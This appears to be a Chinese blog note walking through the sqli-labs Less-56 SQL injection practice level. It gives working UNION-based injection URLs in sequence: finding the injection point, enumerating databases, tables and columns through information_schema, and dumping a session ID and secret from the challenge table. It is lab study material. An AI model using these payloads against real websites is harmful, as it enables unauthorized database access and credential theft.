Sqli-labs-Less-56(笔记)

时间  2021-07-14 标签 SQL注入练习笔记 sql mysql web安全 web 安全

Sqli-labs-Less-56(笔记)

在这里插入图片描述
本关对输入次数的限制为14次
查找注入点
尝试了5次,找到注入点
http://www.web.com/sql/Less-56/?id=1’)–+
在这里插入图片描述
查看当前库和所有数据库
http://www.web.com/sql/Less-56/?id=-1’) union select 1,database(),group_concat(schema_name) from information_schema.schemata–+
在这里插入图片描述
查看所有表
http://www.web.com/sql/Less-56/?id=-1’) union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=‘challenges’–+
在这里插入图片描述
查看字段
http://www.web.com/sql/Less-56/?id=-1’) union select 1,database(),group_concat(column_name) from information_schema.columns where table_name=‘v35mb8m56l’–+
在这里插入图片描述
查看账户和密码
http://www.web.com/sql/Less-56/?id=-1’) union select 1,database(),group_concat(concat_ws(’~’,sessid,secret_PG94)) from challenges.v35mb8m56l–+
在这里插入图片描述
将得到的密码输入到下面的方框中进行验证
在这里插入图片描述
成功
在这里插入图片描述

联系我们 沪ICP备13005482号-10